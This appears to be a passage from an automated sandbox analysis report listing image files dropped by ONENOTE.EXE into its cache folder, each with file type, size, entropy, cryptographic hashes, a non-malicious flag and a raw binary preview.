                                                                                                                                                                                                                  Size (bytes):5136
                                                                                                                                                                                                                  Entropy (8bit):7.622045262603241
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                                                                                                                                  MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                                                                                                                                  SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                                                                                                                                  SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                                                                                                                                  SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000091.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):52945
                                                                                                                                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                                                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                                                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                                                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                                                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000093.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):79656
                                                                                                                                                                                                                  Entropy (8bit):7.966459570826366
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                                                                                                                                  MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                                                                                                                                  SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                                                                                                                                  SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                                                                                                                                  SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000095.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40884
                                                                                                                                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000097.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):68633
                                                                                                                                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000099.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 176 x 513, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11043
                                                                                                                                                                                                                  Entropy (8bit):7.96811228801767
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
                                                                                                                                                                                                                  MD5:8E9AB9C28B155A66BC5C0DA5E2A4EFB5
                                                                                                                                                                                                                  SHA1:972E61F162D48F1CEE21963ECBB2FE439105DB55
                                                                                                                                                                                                                  SHA-256:B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
                                                                                                                                                                                                                  SHA-512:12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.|.L.|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....|.)

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009B.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):647
                                                                                                                                                                                                                  Entropy (8bit):6.854433034679255
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                                                                                                                                  MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                                                                                                                                  SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                                                                                                                                  SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                                                                                                                                  SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009D.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):52912
                                                                                                                                                                                                                  Entropy (8bit):7.679147474806877
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                                                                                                                                  MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                                                                                                                                  SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                                                                                                                                  SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                                                                                                                                  SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009F.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):27862
                                                                                                                                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                                                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                                                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                                                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                                                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009H.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                  Entropy (8bit):7.231269197132181
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                                                                                                                                  MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                                                                                                                                  SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                                                                                                                                  SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                                                                                                                                  SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009J.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):34299
                                                                                                                                                                                                                  Entropy (8bit):7.247541176493898
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                                                                                                                                  MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                                                                                                                                  SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                                                                                                                                  SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                                                                                                                                  SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009L.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):10056
                                                                                                                                                                                                                  Entropy (8bit):7.956064700093514
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                                                                                                                                  MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                                                                                                                                  SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                                                                                                                                  SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                                                                                                                                  SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009N.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):84097
                                                                                                                                                                                                                  Entropy (8bit):7.78862495530604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                                                                                                                                  MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                                                                                                                                  SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                                                                                                                                  SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                                                                                                                                  SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009P.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):64118
                                                                                                                                                                                                                  Entropy (8bit):7.742974333356952
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                                                                                                                                  MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                                                                                                                                  SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                                                                                                                                  SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                                                                                                                                  SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                                                                                                                                  Malicious:false
